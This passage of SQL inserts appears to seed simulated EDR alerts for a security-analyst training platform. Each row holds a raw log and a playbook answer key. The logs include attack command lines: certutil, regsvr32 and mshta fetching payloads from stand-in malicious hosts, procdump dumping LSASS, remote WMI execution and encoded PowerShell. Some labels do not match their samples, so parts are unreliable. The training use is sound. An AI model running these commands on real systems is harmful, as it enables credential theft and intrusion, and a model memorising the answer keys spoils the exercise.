(2076, 'Suspicious Network Activity Indicative of Lateral Movement', 'high', 'Sysmon', 'Unusual internal network traffic patterns suggest lateral movement attempts within the network, potentially using compromised credentials.', 'Lateral Movement', 'T1076', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:22:10Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.3.45\",\"dst_ip\":\"192.168.3.50\",\"username\":\"svc_account\",\"hostname\":\"Server-12\",\"command_line\":null}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the corporate network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.3.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the corporate network.\"}}],\"expected_actions\":[\"collect_forensics\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The network traffic pattern between internal hosts suggests potential lateral movement, possibly indicating compromised credentials or a pivot attempt.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS', NULL, NULL, NULL, 0),
(2077, 'Registry Modification via Regsvr32 for Persistence', 'high', 'CrowdStrike', 'Regsvr32 was used to execute a suspicious script, modifying registry settings to establish persistence on the host.', 'Persistence', 'T1112', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:55:05Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.4.30\",\"dst_ip\":\"192.168.4.30\",\"username\":\"hlee\",\"hostname\":\"Workstation-14\",\"command_line\":\"regsvr32 /s /n /u /i:http://malicious.example.com/script.sct scrobj.dll\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.4.30\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the corporate network.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious.example.com/script.sct\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL linked to a known malicious script used for persistence.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Regsvr32 was leveraged to execute a remote script designed to modify registry settings, a common technique for establishing persistence on the host.\"}', 'Advanced', 'EDR', 7, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2078, 'Credential Dumping via LSASS Access Detected', 'critical', 'CrowdStrike', 'A suspicious process attempted to access LSASS memory for credential dumping. This indicates a potential attempt to extract credentials.', 'Credential Attack', 'T1003', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:34:56Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.102\",\"dst_ip\":\"192.168.1.105\",\"username\":\"admin_user\",\"hostname\":\"CORP-SERVER01\",\"command_line\":\"powershell.exe -enc ZWNobyBIZWxsbyBXb3JsZA==\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Logs\",\"verdict\":\"internal\",\"details\":\"Source IP is an internal address on the corporate network\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc ZWNobyBIZWxsbyBXb3JsZA==\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicative of malicious activity\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The encoded PowerShell command indicates an attempt to dump credentials using a fileless method.\"}', 'Advanced', 'EDR', 7, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2079, 'Suspicious Lateral Movement via WMI Detected', 'high', 'SentinelOne', 'Lateral movement attempt detected using WMI from one internal server to another. This could indicate a hacker attempting to move within the network.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T05:12:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.20\",\"dst_ip\":\"192.168.2.30\",\"username\":\"network_admin\",\"hostname\":\"CORP-DC01\",\"command_line\":\"wmic /node:192.168.2.30 process call create \'cmd.exe /c calc.exe\'\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Logs\",\"verdict\":\"internal\",\"details\":\"Source IP is an internal address on the corporate network\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"wmic /node:192.168.2.30 process call create \'cmd.exe /c calc.exe\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"WMI command used for lateral movement with potential malicious intent\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of WMI commands to execute processes on a remote machine is indicative of lateral movement attempts.\"}', 'Advanced', 'EDR', 7, 1, 'TECH', NULL, NULL, NULL, 0),
(2080, 'Fileless Malware Activity Detected via Encoded PowerShell', 'critical', 'Carbon Black', 'Detected execution of encoded PowerShell indicative of fileless malware activity. This could be an attempt to execute malicious scripts in memory.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:15Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.55\",\"dst_ip\":\"192.168.1.60\",\"username\":\"sysadmin\",\"hostname\":\"WORKSTATION-12\",\"command_line\":\"powershell.exe -enc aQBlAHgAIAB8ACAAZgBvAFIAZQBhAGMAaAAgACgAJABjAG8AbQBtAGEAbgBkADoAUABvAHcAZQByAFMAaABlAGwAbAAgAC0AZQBuAGMAIAAtAHYAcgBlAGIAOwApAHwAIAAtAGYAcgBlAGUAbwBlAGQAKQAgAH0A\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Logs\",\"verdict\":\"internal\",\"details\":\"Source IP is an internal address on the corporate network\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc aQBlAHgAIAB8ACAAZgBvAFIAZQBhAGMAaAAgACgAJABjAG8AbQBtAGEAbgBkADoAUABvAHcAZQByAFMAaABlAGwAbAAgAC0AZQBuAGMAIAAtAHYAcgBlAGIAOwApAHwAIAAtAGYAcgBlAGUAbwBlAGQAKQAgAH0A\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command associated with known fileless malware techniques\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell command is characteristic of fileless malware, which executes scripts directly in memory.\"}', 'Advanced', 'EDR', 7, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2081, 'Malicious Network Connection Detected to Known C2 Server', 'high', 'Sysmon', 'A network connection was established with a known command and control server. This is indicative of potential malware communication or data exfiltration.', 'Data Exfiltration', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T15:23:12Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.5.100\",\"dst_ip\":\"203.0.113.25\",\"username\":\"jdoe\",\"hostname\":\"CLIENT-XY\",\"request_body\":\"N/A\",\"command_line\":\"certutil.exe -urlcache -split -f http://malicious-server.com/payload.exe\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for hosting malware\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"certutil.exe -urlcache -split -f http://malicious-server.com/payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Use of certutil.exe for downloading malware payloads is a known tactic\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The connection to a known malicious IP and use of certutil.exe to download a payload indicates a data exfiltration attempt.\"}', 'Advanced', 'EDR', 7, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2082, 'Suspicious Execution of MSHTA for Script Execution', 'high', 'CrowdStrike', 'Detected the use of mshta.exe to execute a remote script. This is often used in fileless attacks and could indicate malicious activity.', 'Malware', 'T1218.005', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:47:03Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.0.150\",\"dst_ip\":\"192.168.0.151\",\"username\":\"user123\",\"hostname\":\"DESKTOP-ABCD\",\"command_line\":\"mshta.exe http://malicious-site.com/script.hta\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.0.150\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Logs\",\"verdict\":\"internal\",\"details\":\"Source IP is an internal address on the corporate network\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"mshta.exe http://malicious-site.com/script.hta\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with malicious activities, often used in phishing attacks\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of mshta.exe to execute remote scripts is a well-known tactic for executing malicious code.\"}', 'Advanced', 'EDR', 7, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2083, 'PowerShell Fileless Malware Detected via Encoded Command', 'critical', 'CrowdStrike', 'A PowerShell script with encoded commands was executed on the host, indicative of a fileless malware attack. The command was used to download and execute malicious payloads.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:25:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.12\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"CORP-WIN10-02\",\"command_line\":\"powershell.exe -NoP -NonI -W Hidden -Enc W3JpY2tvbGV0IGNvbW1hbmQuZXhl\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -NoP -NonI -W Hidden -Enc W3JpY2tvbGV0IGNvbW1hbmQuZXhl\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command often used in fileless malware attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the corporate network\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded PowerShell command was used to execute a fileless malware attack, which is a known method to evade detection.\"}', 'Advanced', 'EDR', 7, 1, 'FINANCE', NULL, NULL, NULL, 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(2084, 'Credential Dumping Detected via LSASS Access', 'critical', 'SentinelOne', 'Suspicious access to LSASS memory detected, indicating potential credential dumping activity. This is often a precursor to lateral movement.', 'Credential_Attack', 'T1003', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"\",\"username\":\"admin\",\"hostname\":\"CORP-SRV01\",\"command_line\":\"procdump.exe -ma lsass.exe\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"procdump.exe -ma lsass.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Procdump used to extract credentials from LSASS memory\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the corporate network\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Procdump was used to access LSASS, which is a common technique for credential dumping.\"}', 'Advanced', 'EDR', 7, 1, 'TECH', NULL, NULL, NULL, 0),
(2085, 'Lateral Movement Detected via WMI Execution', 'high', 'Carbon Black', 'WMI was used to execute commands on a remote host, suggesting lateral movement activity within the network.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"192.168.1.25\",\"username\":\"analyst\",\"hostname\":\"CORP-ADMIN01\",\"command_line\":\"wmic /node:192.168.1.25 process call create \\\"cmd.exe /c whoami\\\"\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"wmic /node:192.168.1.25 process call create \\\"cmd.exe /c whoami\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"WMI used for lateral movement within the network\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the corporate network\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the corporate network\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of WMI to execute commands on another system is indicative of lateral movement tactics.\"}', 'Advanced', 'EDR', 7, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2086, 'Suspicious Use of Certutil for Data Exfiltration', 'high', 'Sysmon', 'Certutil was used to encode and potentially exfiltrate data, a common method used by attackers to bypass security controls.', 'Data_Exfiltration', 'T1140', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.16\",\"dst_ip\":\"\",\"username\":\"tuser\",\"hostname\":\"CORP-LAPTOP01\",\"command_line\":\"certutil -encode data.txt encoded_data.txt\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"certutil -encode data.txt encoded_data.txt\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Certutil used for encoding data, potentially for exfiltration\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.16\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the corporate network\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Certutil is often used by attackers to encode and exfiltrate data without detection.\"}', 'Advanced', 'EDR', 7, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2087, 'Regsvr32 Execution of Malicious Script', 'high', 'CrowdStrike', 'Regsvr32 was used to execute a remote script, a known technique for bypassing application whitelisting defenses.', 'Malware', 'T1218.010', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.3.10\",\"dst_ip\":\"\",\"username\":\"hacker\",\"hostname\":\"CORP-DESKTOP01\",\"command_line\":\"regsvr32 /s /n /u /i:https://malicious.com/script.sct scrobj.dll\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"regsvr32 /s /n /u /i:https://malicious.com/script.sct scrobj.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Malicious script hosted at the URL executed using regsvr32\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.3.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the corporate network\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://malicious.com/script.sct\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Malicious script hosted at this URL\"}}],\"expected_actions\":[\"block_ip\",\"block_hash\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Use of regsvr32 to execute remote scripts is a known method for evading detection and executing malicious payloads.\"}', 'Advanced', 'EDR', 7, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2088, 'Credential Dumping Detected via LSASS Memory Access', 'critical', 'CrowdStrike', 'A suspicious process was detected accessing LSASS memory, indicating a potential credential dumping attempt. The attack originated from an internal system using PowerShell with encoded commands.', 'Credential Attack', 'T1003', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:22:34Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.1.15\",\"dst_ip\":\"10.0.1.20\",\"username\":\"admin_user\",\"hostname\":\"CORP-SERVER01\",\"command_line\":\"powershell.exe -enc SQBFAFgAQwBTAEEAbABsAGUAbQB1AE4ARQByAEkAdwBTAEEAbABlAG0A\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in credential attack\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc SQBFAFgAQwBTAEEAbABsAGUAbQB1AE4ARQByAEkAdwBTAEEAbABlAG0A\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicative of credential dumping\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The PowerShell command was encoded and aimed at accessing LSASS, a common technique for credential dumping.\"}', 'Advanced', 'EDR', 7, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2089, 'Lateral Movement Detected via WMI Execution', 'high', 'Carbon Black', 'Suspicious WMI command execution detected originating from a compromised internal host, indicating lateral movement within the network.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T21:45:12Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.2.30\",\"dst_ip\":\"10.0.2.45\",\"username\":\"network_admin\",\"hostname\":\"CORP-WORKSTATION15\",\"command_line\":\"wmic /node:10.0.2.45 process call create \'cmd /c whoami\'\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.30\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"internal\",\"details\":\"Internal IP address initiating WMI command\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"wmic /node:10.0.2.45 process call create \'cmd /c whoami\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"WMI command used for lateral movement detected\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"WMI execution from one internal host to another is indicative of lateral movement attempts.\"}', 'Advanced', 'EDR', 7, 1, 'TECH', NULL, NULL, NULL, 0),
(2090, 'Fileless Malware via Encoded PowerShell Command', 'critical', 'SentinelOne', 'A fileless malware attack was detected involving an encoded PowerShell command. The attack was aimed at downloading and executing malicious scripts.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:17:50Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.50\",\"username\":\"user01\",\"hostname\":\"CORP-LAPTOP07\",\"command_line\":\"powershell.exe -enc YwBlAHIAdAB1AHQAaQBsAC4AZQB4AGUAIAAtAGYAIABzAGgAZQBsAGwALgBlAHgA\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"internal\",\"details\":\"Internal IP address executing fileless malware\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc YwBlAHIAdAB1AHQAaQBsAC4AZQB4AGUAIAAtAGYAIABzAGgAZQBsAGwALgBlAHgA\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command used for fileless attack\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded PowerShell script suggests fileless malware tactics aimed at stealthy execution.\"}', 'Advanced', 'EDR', 7, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2091, 'Suspicious Certutil Activity Detected', 'high', 'Sysmon', 'A suspicious invocation of Certutil was detected, potentially used to download a malicious payload from an external server.', 'Malware', 'T1218', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:30:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.3.22\",\"dst_ip\":\"104.248.123.45\",\"username\":\"guest_user\",\"hostname\":\"CORP-DESKTOP12\",\"command_line\":\"certutil.exe -urlcache -split -f http://malicious-domain.com/payload.exe\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.3.22\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"internal\",\"details\":\"Internal IP address using Certutil for suspicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"certutil.exe -urlcache -split -f http://malicious-domain.com/payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Certutil used to download potentially malicious payload\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Certutil was used in a non-standard way to download files, suggesting misuse for malicious purposes.\"}', 'Advanced', 'EDR', 7, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2092, 'Regsvr32 Executed with Remote Script', 'high', 'CrowdStrike', 'Detected regsvr32 executing a remote script, a common technique for fileless malware execution. The script was hosted on an external IP.', 'Malware', 'T1218.010', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:05:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.4.50\",\"dst_ip\":\"198.51.100.77\",\"username\":\"developer_user\",\"hostname\":\"CORP-SERVER02\",\"command_line\":\"regsvr32.exe /s /u /i:http://dangerous-site.com/script.sct scrobj.dll\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.4.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"internal\",\"details\":\"Internal IP executing regsvr32 with external script\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"regsvr32.exe /s /u /i:http://dangerous-site.com/script.sct scrobj.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Regsvr32 used to execute remote script, typical in fileless attacks\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Regsvr32 was used to execute a script from a remote source, a known fileless malware technique.\"}', 'Advanced', 'EDR', 7, 1, 'TECH', NULL, NULL, NULL, 0),
(2093, 'Suspicious PowerShell Encoded Command Execution Detected', 'critical', 'CrowdStrike', 'A fileless malware attack leveraging PowerShell with encoded commands was detected. The attack was attempting credential dumping from LSASS on an internal server.', 'Malware', 'T1218', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:23Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"10.0.0.20\",\"username\":\"admin_user\",\"hostname\":\"server01\",\"command_line\":\"powershell.exe -enc W1Rlc3RdIHdoaWxlIElFbmNvZGVkQ29tbWFuZA==\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in lateral movement\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc W1Rlc3RdIHdoaWxlIElFbmNvZGVkQ29tbWFuZA==\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicative of fileless malware\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell command was encoded, a common tactic used in fileless malware attacks to evade detection.\"}', 'Advanced', 'EDR', 7, 1, 'TECH', NULL, NULL, NULL, 0),
(2094, 'Credential Dumping via LOLBin Detected on Internal Network', 'high', 'SentinelOne', 'Credential dumping from LSASS was attempted using regsvr32, a known LOLBin technique, indicating potential lateral movement.', 'Credential Attack', 'T1003', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:20:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.1.12\",\"dst_ip\":\"10.0.1.25\",\"username\":\"sysadmin\",\"hostname\":\"workstation03\",\"command_line\":\"regsvr32.exe /s /u /n /i:cmd.exe scrobj.dll\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in the attack\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"regsvr32.exe /s /u /n /i:cmd.exe scrobj.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Use of regsvr32 to execute scripts, indicative of credential dumping\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The use of regsvr32 with cmd.exe indicates an attempt to bypass security controls for credential dumping.\"}', 'Advanced', 'EDR', 7, 1, 'FINANCE', NULL, NULL, NULL, 0),
